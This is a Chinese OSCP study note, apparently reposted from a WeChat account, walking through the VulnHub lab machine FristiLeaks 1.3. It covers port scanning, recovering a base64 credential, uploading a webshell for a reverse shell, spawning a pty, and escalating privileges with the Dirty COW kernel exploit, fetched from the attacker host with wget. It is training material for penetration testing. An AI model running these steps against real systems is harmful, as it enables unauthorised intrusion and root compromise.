东风夜放花千树。更吹落、星如雨。《青玉案·元夕》 -宋·辛弃疾
OSCP备考系列 第0x06篇笔记;
笔记顺序参考官方靶场(节选)
OSCP官方推荐靶场:
https://docs.google.com/spreadsheets/u/0/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/htmlview?pli=1#
下载:https://www.vulnhub.com/entry/fristileaks-13,133/
下载完成后 导入到vmware中. 依照官网的提示 把网卡改一下。
00.主机发现
01.端口扫描
开放了25 80 110端口。
02.指纹识别 目录扫描
访问robots文件
三个目录打开都是相同的图片:
03.根据首页提示
找到fristi目录。
右键源代码 :似乎有可用的内容
用户名eezeepz + 一串base64的字符串
对其解码:
似乎是png格式的内容,想办法展示出来
登录成功:
上传木马文件:尝试反弹
现在已经获取到权限了,尝试提权。
用python创建反弹:
python -c 'import pty;pty.spawn("/bin/bash")'
查看系统内核:
2.6.32系统内核 存在脏牛提权。
https://github.com/firefart/dirtycow/blob/master/dirty.c
攻击机开启http服务,靶机下载exp。
攻击机:python -m http.server 80
靶机:wget http://192.168.65.136/dirty.c
脏牛的用法:
借鉴参考:https://mp.weixin.qq.com/s/ffZjVyVowCYDZ04Aj7uvUw
重点:
01.文件的上传路径。
原文始发于微信公众号(0x00实验室):VulnHub靶机 | FristiLeaks: 1.3
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论